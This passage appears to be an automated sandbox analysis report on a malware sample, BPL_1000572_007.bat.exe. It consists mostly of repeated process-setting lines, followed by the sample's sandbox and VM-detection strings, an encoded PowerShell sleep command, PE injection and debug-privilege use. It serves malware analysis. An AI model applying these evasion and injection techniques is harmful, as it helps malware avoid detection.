                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592077345.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLJ(REMOTETHREADSUSPENDED) [-] NTPROTECTVIRTUALMEMORY, PAGE_EXECUTE_READ: {0}ESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS/(REMOTETHREADSUSPENDED) [-] NTRESUMETHREAD: {0}
                  Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 868Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 3028Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9552
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.21.drBinary or memory string: VMware
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.444162317.0000000000DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                  Source: Amcache.hve.21.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                  Source: Amcache.hve.21.drBinary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
                  Source: Amcache.hve.21.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                  Source: Amcache.hve.21.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                  Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
                  Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.21.drBinary or memory string: VMware7,1
                  Source: Amcache.hve.21.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmtools
                  Source: Amcache.hve.21.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.21.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.me
                  Source: Amcache.hve.21.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                  Source: Amcache.hve.21.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.21.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Encrypted powershell cmdline option found
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: Base64 decoded Start-Sleep -Seconds 50
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: Base64 decoded Start-Sleep -Seconds 50
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeMemory written: C:\Users\user\Desktop\BPL_1000572_007.bat.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
